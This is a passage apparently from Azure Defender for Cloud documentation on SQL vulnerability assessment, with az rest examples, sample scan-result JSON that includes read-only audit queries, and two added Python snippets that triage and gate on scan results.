          "description": "SQL Threat Detection provides a layer of security, which detects potential vulnerabilities and anomalous activity in databases, such as SQL injection attacks and unusual behavior patterns. When a potential threat is detected, Threat Detection sends an actionable real-time alert by email and in Azure Security Center, which includes clear investigation and remediation steps for the specific threat. For more information please see https://docs.microsoft.com/en-us/azure/sql-database/sql-database-threat-detection.\nThis check verifies that SQL Threat Detection is enabled",
          "queryCheck": {
            "columnNames": [
              "Violation"
            ],
            "expectedResult": [
              [
                "0"
              ]
            ],
            "query": "SELECT CASE WHEN EXISTS\n    ( SELECT * FROM sys.audits WHERE name LIKE '%SqlDbThreatDetection_ServerAudit%' ) THEN 0\n    ELSE 1\n    END AS [Violation]"
          },
          "rationale": "Even when database systems apply thorough security measures, breaches can occur and it is important to have a detection mechanism in place. SQL Threat Detection should be enabled to detect any such potential threats that may compromise the data stored in Azure SQL Databases.",
          "ruleId": "VA2060",
          "ruleType": "Binary",
          "severity": "Medium",
          "title": "SQL Threat Detection should be enabled at the server level"
        },
        "status": "NonFinding"
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans/scanResults"
    }
  ]
}


Get SQL vulnerability assessment scan results on user database

Example 1:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/scans/$ScanId/scanresults/$RuleId?api-version=2022-02-01-preview

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA2062/scanResults/VA2062",
  "name": "VA2062",
  "properties": {
    "baselineAdjustedResult": {
      "baseline": {
        "expectedResults": [
          [
            "AllowAll",
            "0.0.0.0",
            "255.255.255.255"
          ]
        ],
        "updatedTime": "2023-05-15T12:52:17.0297386+00:00"
      },
      "resultsNotInBaseline": [],
      "resultsOnlyInBaseline": [
        [
          "AllowAll",
          "0.0.0.0",
          "255.255.255.255"
        ]
      ],
      "status": "Finding"
    },
    "errorMessage": null,
    "isTrimmed": false,
    "queryResults": [],
    "remediation": {
      "automated": false,
      "description": "Remove database firewall rules that grant excessive access",
      "portalLink": "",
      "scripts": []
    },
    "ruleId": "VA2062",
    "ruleMetadata": {
      "benchmarkReferences": [],
      "category": "SurfaceAreaReduction",
      "description": "The Azure SQL Database-level firewall helps protect your data by preventing all access to your database until you specify which IP addresses have permission. Database-level firewall rules grant access to the specific database based on the originating IP address of each request.\n\nDatabase-level firewall rules for master and user databases can only be created and managed through Transact-SQL (unlike server-level firewall rules which can also be created and managed using the Azure portal or PowerShell). For more details please see: https://docs.microsoft.com/en-us/azure/sql-database/sql-database-firewall-configure\n\nThis check verifies that each database-level firewall rule does not grant access to more than 255 IP addresses.",
      "queryCheck": {
        "columnNames": [
          "Firewall Rule Name",
          "Start Address",
          "End Address"
        ],
        "expectedResult": [],
        "query": "SELECT name AS [Firewall Rule Name]\n    ,start_ip_address AS [Start Address]\n    ,end_ip_address AS [End Address]\nFROM sys.database_firewall_rules\nWHERE (\n    (CONVERT(bigint, parsename(end_ip_address, 1)) +\n    CONVERT(bigint, parsename(end_ip_address, 2)) * 256 +\n    CONVERT(bigint, parsename(end_ip_address, 3)) * 65536 +\n    CONVERT(bigint, parsename(end_ip_address, 4)) * 16777216)\n    -\n    (CONVERT(bigint, parsename(start_ip_address, 1)) +\n    CONVERT(bigint, parsename(start_ip_address, 2)) * 256 +\n    CONVERT(bigint, parsename(start_ip_address, 3)) * 65536 +\n    CONVERT(bigint, parsename(start_ip_address, 4)) * 16777216)\n    ) = 255"
      },
      "rationale": "Often, administrators add rules that grant excessive access as part of a troubleshooting process - to eliminate the firewall as the source of a problem, they simply create a rule that allows all traffic to pass to the affected database.\n\nGranting excessive access using database firewall rules is a clear security concern, as it violates the principle of least privilege by allowing unnecessary access to your database. In fact, it's the equivalent of placing the database outside of the firewall.",
      "ruleId": "VA2062",
      "ruleType": "NegativeList",
      "severity": "High",
      "title": "Database-level firewall rules should not grant excessive access"
    },
    "status": "NonFinding"
  },
  "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"
}

Example 2:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/scans/$ScanId/scanresults?api-version=2022-02-01-preview

{
  "value": [
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA1020/scanResults/VA1020",
      "name": "VA1020",
      "properties": {
        "baselineAdjustedResult": null,
        "errorMessage": null,
        "isTrimmed": false,
        "queryResults": [],
        "remediation": {
          "automated": true,
          "description": "Remove the special user GUEST from all roles.",
          "portalLink": "",
          "scripts": []
        },
        "ruleId": "VA1020",
        "ruleMetadata": {
          "benchmarkReferences": [
            {
              "benchmark": "FedRAMP",
              "reference": null
            }
          ],
          "category": "AuthenticationAndAuthorization",
          "description": "The guest user permits access to a database for any logins that are not mapped to a specific database user. This rule checks that no database roles are assigned to the Guest user.",
          "queryCheck": {
            "columnNames": [
              "Role"
            ],
            "expectedResult": [],
            "query": "SELECT roles.[name] AS [Role]\nFROM sys.database_role_members AS drms\nINNER JOIN sys.database_principals AS roles ON drms.role_principal_id = roles.principal_id\nINNER JOIN sys.database_principals AS users ON drms.member_principal_id = users.principal_id\nWHERE users.[name] = 'guest'"
          },
          "rationale": "Database Roles are the basic building block at the heart of separation of duties and the principle of least permission. Granting the Guest user membership to specific roles defeats this purpose.",
          "ruleId": "VA1020",
          "ruleType": "NegativeList",
          "severity": "High",
          "title": "Database user GUEST should not be a member of any"
        },
        "status": "NonFinding"
      },
      "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"
    },
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default/scans/VA1054/scanResults/VA1054",
      "name": "VA1054",
      "properties": {
        "baselineAdjustedResult": null,
        "errorMessage": null,
        "isTrimmed": false,
        "queryResults": [],
        "remediation": {
          "automated": false,
          "description": "Revoke unnecessary permissions granted to PUBLIC",
          "portalLink": "",
          "scripts": []
        },
        "ruleId": "VA1054",
        "ruleMetadata": {
          "benchmarkReferences": [
            {
              "benchmark": "FedRAMP",
              "reference": null
            }
          ],
          "category": "AuthenticationAndAuthorization",
          "description": "Every SQL Server login belongs to the public server role. When a server principal has not been granted or denied specific permissions on a securable object, the user inherits the permissions granted to public on that object. This rule displays a list of all securable objects or columns that are accessible to all users through the PUBLIC role.",
          "queryCheck": {
            "columnNames": [
              "Permission",
              "Schema",
              "Object"
            ],
            "expectedResult": [],
            "query": "SELECT permission_name AS [Permission]\n    ,schema_name AS [Schema]\n    ,object_name AS [Object]\nFROM (\n    SELECT objs.TYPE COLLATE database_default AS object_type\n        ,schema_name(schema_id) COLLATE database_default AS schema_name\n        ,objs.name COLLATE database_default AS object_name\n        ,user_name(grantor_principal_id) COLLATE database_default AS grantor_principal_name\n        ,permission_name COLLATE database_default AS permission_name\n        ,perms.TYPE COLLATE database_default AS TYPE\n        ,STATE COLLATE database_default AS STATE\n    FROM sys.database_permissions AS perms\n    INNER JOIN sys.objects AS objs\n        ON objs.object_id = perms.major_id\n    WHERE perms.class = 1 -- objects or columns. Other cases are handled by VA1095 which has different remediation syntax\n        AND grantee_principal_id = DATABASE_PRINCIPAL_ID('public')\n        AND [state] IN (\n            'G'\n            ,'W'\n            )\n        AND NOT (\n            -- These permissions are granted by default to public\n            permission_name = 'EXECUTE'\n            AND schema_name(schema_id) = 'dbo'\n            AND STATE = 'G'\n            AND objs.name IN (\n                'fn_sysdac_is_dac_creator'\n                ,'fn_sysdac_is_currentuser_sa'\n                ,'fn_sysdac_is_login_creator'\n                ,'fn_sysdac_get_username'\n                ,'sp_sysdac_ensure_dac_creator'\n                ,'sp_sysdac_add_instance'\n                ,'sp_sysdac_add_history_entry'\n                ,'sp_sysdac_delete_instance'\n                ,'sp_sysdac_upgrade_instance'\n                ,'sp_sysdac_drop_database'\n                ,'sp_sysdac_rename_database'\n                ,'sp_sysdac_setreadonly_database'\n                ,'sp_sysdac_rollback_committed_step'\n                ,'sp_sysdac_update_history_entry'\n                ,'sp_sysdac_resolve_pending_entry'\n                ,'sp_sysdac_rollback_pending_object'\n                ,'sp_sysdac_rollback_all_pending_objects'\n                ,'fn_sysdac_get_currentusername'\n                )\n            OR permission_name = 'SELECT'\n            AND schema_name(schema_id) = 'sys'\n            AND STATE = 'G'\n            AND objs.name IN (\n                'firewall_rules'\n                ,'database_firewall_rules'\n                ,'ipv6_database_firewall_rules'\n                ,'bandwidth_usage'\n                ,'database_usage'\n                ,'external_library_setup_errors'\n                ,'sql_feature_restrictions'\n                ,'resource_stats'\n                ,'elastic_pool_resource_stats'\n                ,'dm_database_copies'\n                ,'geo_replication_links'\n                ,'database_error_stats'\n                ,'event_log'\n                ,'database_connection_stats'\n                )\n            OR permission_name = 'SELECT'\n            AND schema_name(schema_id) = 'dbo'\n            AND STATE = 'G'\n            AND objs.name IN (\n                'sysdac_instances_internal'\n                ,'sysdac_history_internal'\n                ,'sysdac_instances'\n                )\n            )\n    )"
          },
          "rationale": "Database Roles are the basic building block at the heart of separation of duties and the principle of least permission. Granting permissions to principals through the default PUBLIC role defeats this purpose. ",
          "ruleId": "VA1054",
          "ruleType": "NegativeList",
          "severity": "Low",
          "title": "Excessive permissions should not be granted to PUBLIC role on objects or columns"
        },
        "status": "NonFinding"
      },
      "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResults"
    }
  ]
}
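The scan-results listings above carry, per rule, a raw status, the rule's severity and title under ruleMetadata, and optionally a baselineAdjustedResult with its own status; the VA2062 response shows the two statuses can disagree. The Python below is an added example, not code from this page or from Defender for Cloud: it reads that listing shape and produces the reviewer's view, failed rules ordered by severity, with rules whose raw and baseline-adjusted statuses disagree flagged for manual review rather than silently resolved either way. The listing it runs on is constructed; rule ids, titles and severities are taken from the rule metadata shown on the page, the statuses are chosen to exercise each path.

```python
"""Triage of a SQL vulnerability assessment scan-results listing.

Added example; not code from the Defender for Cloud page or the service.
It consumes the JSON shape returned by .../scans/{scanId}/scanresults
(a "value" list of scanResults objects with ruleId, ruleMetadata.severity,
status and an optional baselineAdjustedResult). The listing below is
constructed for this example; field names follow the page, values are
illustrative.
"""
from typing import Any, Dict, List, Optional

SEVERITY_RANK = {"High": 0, "Medium": 1, "Low": 2}


def make_result(rule_id: str, severity: str, title: str, status: str,
                adjusted_status: Optional[str] = None) -> Dict[str, Any]:
    """Constructed scanResults object carrying only the fields triage reads."""
    props: Dict[str, Any] = {
        "ruleId": rule_id,
        "ruleMetadata": {"severity": severity, "title": title},
        "status": status,
        "baselineAdjustedResult": None,
    }
    if adjusted_status is not None:
        props["baselineAdjustedResult"] = {"status": adjusted_status}
    return {"name": rule_id, "properties": props}


# Constructed listing (not the page's output).
SAMPLE_LISTING = {"value": [
    make_result("VA2065", "High", "Server-level firewall rules should be tracked "
                "and maintained at a strict minimum", "NonFinding"),
    make_result("VA2062", "High", "Database-level firewall rules should not grant "
                "excessive access", "NonFinding", adjusted_status="Finding"),
    make_result("VA2060", "Medium", "SQL Threat Detection should be enabled at the "
                "server level", "NonFinding", adjusted_status="NonFinding"),
    make_result("VA1054", "Low", "Excessive permissions should not be granted to "
                "PUBLIC role on objects or columns", "Finding"),
    make_result("VA1223", "High", "Certificate keys should use at least 2048 bits",
                "Finding"),
]}


def classify(result: Dict[str, Any]) -> str:
    """Return "Finding", "NonFinding" or "Review".

    Both the raw status and the baseline-adjusted status come from the
    service; when they disagree (the page's VA2062 response is such a case)
    this example does not guess which one wins and marks the rule for a
    manual look instead.
    """
    props = result["properties"]
    raw = props["status"]
    adjusted = props.get("baselineAdjustedResult") or {}
    adjusted_status = adjusted.get("status")
    if adjusted_status is None or adjusted_status == raw:
        return raw
    return "Review"


def triage(listing: Dict[str, Any]) -> Dict[str, Any]:
    """Summarize a scan-results listing for a reviewer."""
    attention: List[Dict[str, str]] = []
    by_severity: Dict[str, int] = {}
    for result in listing["value"]:
        verdict = classify(result)
        if verdict == "NonFinding":
            continue
        meta = result["properties"]["ruleMetadata"]
        attention.append({
            "ruleId": result["properties"]["ruleId"],
            "severity": meta["severity"],
            "title": meta["title"],
            "verdict": verdict,
        })
        if verdict == "Finding":
            by_severity[meta["severity"]] = by_severity.get(meta["severity"], 0) + 1
    # Highest severity first; confirmed findings before items that only need review.
    attention.sort(key=lambda a: (SEVERITY_RANK.get(a["severity"], 99),
                                  a["verdict"] != "Finding", a["ruleId"]))
    return {"attention": attention, "findingsBySeverity": by_severity,
            "rulesChecked": len(listing["value"])}


def main() -> None:
    report = triage(SAMPLE_LISTING)
    print(f"rules checked: {report['rulesChecked']}, "
          f"findings by severity: {report['findingsBySeverity']}")
    for item in report["attention"]:
        print(f"{item['severity']:6} {item['verdict']:10} {item['ruleId']}  {item['title']}")


if __name__ == "__main__":
    main()
```

To run it against real output, load the JSON printed by the `az rest ... /scanresults` command shown above and pass it to `triage` in place of `SAMPLE_LISTING`; the function reads only the fields that every scanResults object on this page carries.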


Get SQL vulnerability assessment scans on system database

Example 1:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/scans/$ScanId?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/scans/ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d",
  "name": "ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d",
  "properties": {
    "database": "master",
    "endTime": "2023-04-24T07:07:15.4704608Z",
    "highSeverityFailedRulesCount": 0,
    "isBaselineApplied": true,
    "lowSeverityFailedRulesCount": 0,
    "mediumSeverityFailedRulesCount": 0,
    "scanId": "ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d",
    "server": "vulnerabilityaseessmenttest",
    "sqlVersion": "16.0.5100",
    "startTime": "2023-04-24T07:07:15.4079623Z",
    "state": "Passed",
    "totalFailedRulesCount": 0,
    "totalPassedRulesCount": 9,
    "totalRulesCount": 9,
    "triggerType": "OnDemand"
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans"
}

Example 2:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/scans?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "value": [
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/scans/ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d",
      "name": "ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d",
      "properties": {
        "database": "master",
        "endTime": "2023-04-24T07:07:15.4704608Z",
        "highSeverityFailedRulesCount": 0,
        "isBaselineApplied": true,
        "lowSeverityFailedRulesCount": 0,
        "mediumSeverityFailedRulesCount": 0,
        "scanId": "ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d",
        "server": "vulnerabilityaseessmenttest",
        "sqlVersion": "16.0.5100",
        "startTime": "2023-04-24T07:07:15.4079623Z",
        "state": "Passed",
        "totalFailedRulesCount": 0,
        "totalPassedRulesCount": 9,
        "totalRulesCount": 9,
        "triggerType": "OnDemand"
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans"
    },
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/scans/f3ec698b-104c-40a7-b1eb-251ff83bcf4e",
      "name": "f3ec698b-104c-40a7-b1eb-251ff83bcf4e",
      "properties": {
        "database": "master",
        "endTime": "2023-04-24T07:07:15.4079623Z",
        "highSeverityFailedRulesCount": 0,
        "isBaselineApplied": true,
        "lowSeverityFailedRulesCount": 1,
        "mediumSeverityFailedRulesCount": 1,
        "scanId": "f3ec698b-104c-40a7-b1eb-251ff83bcf4e",
        "server": "vulnerabilityaseessmenttest",
        "sqlVersion": "16.0.5100",
        "startTime": "2023-04-24T07:02:05.6581079Z",
        "state": "Failed",
        "totalFailedRulesCount": 2,
        "totalPassedRulesCount": 7,
        "totalRulesCount": 9,
        "triggerType": "OnDemand"
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans"
    },
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default/scans/8c26af1e-79d6-4238-b7cf-bc7941714f34",
      "name": "8c26af1e-79d6-4238-b7cf-bc7941714f34",
      "properties": {
        "database": "master",
        "endTime": "2023-04-24T07:02:05.6581079Z",
        "highSeverityFailedRulesCount": 1,
        "isBaselineApplied": false,
        "lowSeverityFailedRulesCount": 1,
        "mediumSeverityFailedRulesCount": 0,
        "scanId": "8c26af1e-79d6-4238-b7cf-bc7941714f34",
        "server": "vulnerabilityaseessmenttest",
        "sqlVersion": "16.0.5100",
        "startTime": "2023-04-17T12:52:45.2387704Z",
        "state": "Failed",
        "totalFailedRulesCount": 2,
        "totalPassedRulesCount": 7,
        "totalRulesCount": 9,
        "triggerType": "OnDemand"
      },
      "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans"
    }
  ]
}


Get SQL vulnerability assessment scans on user database

Example 1:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/scans/$ScanId?api-version=2022-02-01-preview

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/vulnerabilityAssessments/Default/scans/f64d81a1-9d7b-4516-a623-a1bfc845ed7e",
  "name": "f64d81a1-9d7b-4516-a623-a1bfc845ed7e",
  "properties": {
    "database": "db",
    "endTime": "2023-04-17T12:52:41.5235755Z",
    "highSeverityFailedRulesCount": 1,
    "isBaselineApplied": true,
    "lowSeverityFailedRulesCount": 0,
    "mediumSeverityFailedRulesCount": 0,
    "scanId": "f64d81a1-9d7b-4516-a623-a1bfc845ed7e",
    "server": "vulnerabilityaseessmenttest",
    "sqlVersion": "16.0.5100",
    "startTime": "2023-04-17T12:52:41.4142209Z",
    "state": "Failed",
    "totalFailedRulesCount": 1,
    "totalPassedRulesCount": 23,
    "totalRulesCount": 24,
    "triggerType": "OnDemand"
  },
  "type": "Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans"
}

Example 2:

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/scans?api-version=2022-02-01-preview

{
  "value": [
    {
      "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/vulnerabilityAssessments/Default/scans/f64d81a1-9d7b-4516-a623-a1bfc845ed7e",
      "name": "f64d81a1-9d7b-4516-a623-a1bfc845ed7e",
      "properties": {
        "database": "db",
        "endTime": "2023-04-17T12:52:41.5235755Z",
        "highSeverityFailedRulesCount": 1,
        "isBaselineApplied": true,
        "lowSeverityFailedRulesCount": 0,
        "mediumSeverityFailedRulesCount": 0,
        "scanId": "f64d81a1-9d7b-4516-a623-a1bfc845ed7e",
        "server": "vulnerabilityaseessmenttest",
        "sqlVersion": "16.0.5100",
        "startTime": "2023-04-17T12:52:41.4142209Z",
        "state": "Failed",
        "totalFailedRulesCount": 1,
        "totalPassedRulesCount": 23,
        "totalRulesCount": 24,
        "triggerType": "OnDemand"
      },
      "type": "Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans"
    }
  ]
}


Invoke SQL vulnerability assessment scan on system database

Azure CLI

az rest --method Post --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default/initiateScan?api-version=2022-02-01-preview --uri-parameters systemDatabaseName=master

{
  "operation": "ExecuteDatabaseVulnerabilityAssessmentScan",
  "startTime": "2023-05-15T13:07:56.837Z"
}

Invoke SQL vulnerability assessment scan on user database

Azure CLI

az rest --method Post --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/default/initiateScan?api-version=2022-02-01-preview

{
  "operation": "ExecuteDatabaseVulnerabilityAssessmentScan",
  "startTime": "2023-05-15T13:07:08.277Z"
}


Get SQL vulnerability assessment server setting

Azure CLI

az rest --method Get --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default",
  "name": "Default",
  "properties": {
    "state": "Enabled"
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments"
}


Set SQL vulnerability assessment server setting

Example 1:

Azure CLI

az rest --method Put --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview --body '{ \"properties\": { \"state\": \"Enabled\" }}'

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default",
  "name": "Default",
  "properties": {
    "state": "Enabled"
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments"
}


Example 2:

Azure CLI

az rest --method Put --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview --body '{ \"properties\": { \"state\": \"Disabled\" }}'

{
  "id": "/subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Default",
  "name": "Default",
  "properties": {
    "state": "Disabled"
  },
  "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments"
}


Remove SQL vulnerability assessment server setting

Azure CLI

az rest --method Delete --uri /subscriptions/00000000-1111-2222-3333-444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/default?api-version=2022-02-01-preview
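
The az rest calls above are all variations on one resource path, and a scan record is only useful if something acts on it. The following Python is an added example, not code from the Defender for Cloud documentation: it builds the express-configuration URIs used above (server-level setting, per-database assessment, initiateScan, scans), renders the matching az rest invocation, and turns a scan record into a pass/fail verdict that a pipeline can gate on. The subscription, resource group, server and database names are placeholders copied from the examples, SAMPLE_SCAN is a constructed record modelled on the GET scans response, and the severity thresholds in scan_verdict are this example's own choice.

```python
"""
Added example: build the express-configuration SQL vulnerability assessment
URIs used by the az rest calls above and gate on a scan record.

This is not code from the Defender for Cloud documentation.  The names below
are placeholders taken from the examples, and SAMPLE_SCAN is a constructed
record modelled on the GET .../scans response; nothing here calls Azure
unless run_az_rest() is invoked with a logged-in az CLI.
"""
import json
import subprocess

API_VERSION = "2022-02-01-preview"

# Placeholders copied from the documentation examples (assumed values).
SUBSCRIPTION = "00000000-1111-2222-3333-444444444444"
RESOURCE_GROUP = "vulnerabilityaseessmenttestRg"
SERVER = "vulnerabilityaseessmenttest"
DATABASE = "db"


def server_id(subscription, resource_group, server):
    """ARM resource ID of a logical SQL server."""
    return (f"/subscriptions/{subscription}/resourceGroups/{resource_group}"
            f"/providers/Microsoft.Sql/servers/{server}")


def va_uri(subscription, resource_group, server, database=None, action=None):
    """
    Express-configuration vulnerability assessment URI.

    No database -> the server-level setting (.../sqlVulnerabilityAssessments/default).
    With a database -> that database's assessment.  `action` appends a sub-path
    such as "initiateScan" or "scans".
    """
    base = server_id(subscription, resource_group, server)
    if database:
        base += f"/databases/{database}"
    uri = base + "/sqlVulnerabilityAssessments/default"
    if action:
        uri += "/" + action
    return f"{uri}?api-version={API_VERSION}"


def az_rest_command(method, uri, body=None, uri_parameters=None):
    """Equivalent `az rest` invocation as an argv list (no shell quoting needed)."""
    argv = ["az", "rest", "--method", method, "--uri", uri]
    if uri_parameters:
        argv += ["--uri-parameters"] + [f"{k}={v}" for k, v in uri_parameters.items()]
    if body is not None:
        argv += ["--body", json.dumps(body)]
    return argv


def run_az_rest(argv):
    """Run an az rest command and parse its JSON output (needs `az login`)."""
    out = subprocess.run(argv, check=True, capture_output=True, text=True).stdout
    return json.loads(out) if out.strip() else {}


# Constructed scan record modelled on the GET .../scans response above.
SAMPLE_SCAN = {
    "name": "f64d81a1-9d7b-4516-a623-a1bfc845ed7e",
    "properties": {
        "database": DATABASE,
        "highSeverityFailedRulesCount": 1,
        "mediumSeverityFailedRulesCount": 0,
        "lowSeverityFailedRulesCount": 0,
        "isBaselineApplied": True,
        "state": "Failed",
        "totalFailedRulesCount": 1,
        "totalPassedRulesCount": 23,
        "totalRulesCount": 24,
        "triggerType": "OnDemand",
    },
}


def scan_verdict(scan, max_high=0, max_medium=0):
    """
    Decide whether a scan record is acceptable.

    In the sample response `state` is "Failed" with a single failed rule, so
    gating on `state` alone would also block on low-severity findings.  This
    compares the per-severity counters against the caller's thresholds instead
    and cross-checks the counters against the totals the service reports.
    """
    p = scan["properties"]
    high = p.get("highSeverityFailedRulesCount", 0)
    medium = p.get("mediumSeverityFailedRulesCount", 0)
    low = p.get("lowSeverityFailedRulesCount", 0)
    consistent = (high + medium + low == p["totalFailedRulesCount"]
                  and p["totalFailedRulesCount"] + p["totalPassedRulesCount"]
                  == p["totalRulesCount"])
    return {
        "acceptable": consistent and high <= max_high and medium <= max_medium,
        "consistent": consistent,
        "high": high, "medium": medium, "low": low,
        "baseline_applied": bool(p.get("isBaselineApplied", False)),
    }


if __name__ == "__main__":
    # Print the commands for the operations shown above without running them.
    print(" ".join(az_rest_command("Get", va_uri(SUBSCRIPTION, RESOURCE_GROUP, SERVER))))
    print(" ".join(az_rest_command("Post", va_uri(SUBSCRIPTION, RESOURCE_GROUP, SERVER, action="initiateScan"),
                                   uri_parameters={"systemDatabaseName": "master"})))
    print(" ".join(az_rest_command("Post", va_uri(SUBSCRIPTION, RESOURCE_GROUP, SERVER, DATABASE, "initiateScan"))))
    print(scan_verdict(SAMPLE_SCAN))
```

A pipeline would call run_az_rest on the initiateScan command, wait, fetch the scans list, and pass the newest record to scan_verdict; the consistency check catches a truncated or partially parsed response before it can be read as a clean result.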


Next steps 


Find and remediate vulnerabilities in your Azure SQL databases 


Find and remediate vulnerabilities in your Azure SQL databases

Article • 05/10/2023

Microsoft Defender for Cloud provides vulnerability assessment for your Azure SQL databases. Vulnerability assessment scans your databases for software vulnerabilities and provides a list of findings. You can use the findings to remediate software vulnerabilities and disable findings.


Prerequisites

Make sure that you know whether you're using the express or classic configuration before you continue.

To see which configuration you're using:

1. In the Azure portal, open the specific resource in Azure SQL Database, SQL Managed Instance Database, or Azure Synapse.

2. Under the Security heading, select Defender for Cloud.

3. In the Enablement Status, select Configure to open the Microsoft Defender for SQL settings pane for either the entire server or managed instance.

If the vulnerability settings show the option to configure a storage account, you're using the classic configuration. If not, you're using the express configuration.


Find vulnerabilities in your Azure SQL 
databases 


Express configuration (preview) 


Permissions 


One of the following permissions is required to see vulnerability assessment results in the Microsoft Defender for Cloud recommendation SQL databases should have vulnerability findings resolved:

• Security Admin
• Security Reader

The following permission is required to change vulnerability assessment settings:

• SQL Security Manager

If you're receiving automated emails with links to scan results, the following permission is required to access the links about scan results or to view scan results at the resource level:

• SQL Security Manager


Data residency 


SQL vulnerability assessment queries the SQL server using publicly available queries 
under Defender for Cloud recommendations for SQL vulnerability assessment, and 
stores the query results. SQL vulnerability assessment data is stored in the location 
of the logical server it's configured on. For example, if the user enabled vulnerability 
